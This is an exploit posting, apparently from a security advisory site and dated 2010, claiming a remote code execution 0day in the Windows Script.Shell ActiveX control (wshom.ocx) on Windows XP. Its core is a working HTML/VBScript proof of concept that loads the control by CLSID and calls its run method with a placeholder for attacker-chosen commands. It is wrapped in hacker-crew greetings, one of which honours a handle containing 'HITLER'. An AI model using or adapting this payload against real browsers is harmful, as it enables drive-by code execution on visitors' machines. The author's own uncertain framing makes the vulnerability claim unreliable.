Windows Script.Shell.1 0day suffer from ActiveX Remote Code Execution

2010.07.29
Credit: R3d-D3v!L
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

##################################{In The Name Of Allah The Mercifull}###################### # Title : Windows Script.Shell.1 (V 1.0) (wshom.ocx) 0day suffer from ActiveX Remote Code Execution? # Tested : Windows xp (sp3) ## ## Author : R3d-D3v!L <X[at]hotmail.co.jp> # Credits to : XP10_HACKER ((XP10.ME-xp10.com)) ## ## Greetz : DOLLY-MERNA & DR_DAShER & JUPA & hetlar jaddah& Abo-ShA@D ## ## ## all member at XP10.com ## ######################################################## ## infected bath : WINDOWS\system32\wshom.ocx infected Function : Function Exec ( ByVal Command As String ) As IWshExec & Function Run ( ByVal Command As String , [ ByRef WindowStyle As Variant ] , [ ByRef WaitOnReturn As Variant ] ) As Long in (Exec & Run) in IWshShell3 EXPLO!T: <html> </font></b></p> <p> <object classid='clsid:F935DC20-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object> <script language='vbscript'> arg1=" TYPE YOUR EV!L Code Execution? " target.run arg1 </script></p> [~]-----------------------------{((MAGOUSH-87))}------------------------------------------------# # [~] Greetz tO: [dolly &MERNA &DEV!L_MODY &po!S!ON Sc0rp!0N &JASM!N &MARWA & mAG0ush-1987] # # [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # # [~] spechial thanks : ((HITLER JEDDAH & abo-shahd & DR.DAShER & abo-hlil)) # # [?]spechial SupP0RT : MY M!ND # &#169; Offensive Security # # [~]spechial FR!ND: JUPA # # [~] !'M 4R48!4N 3XPL0!73R. # # [~]{[(D!R 4ll 0R D!E)]}; # # [~]---------------------------------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top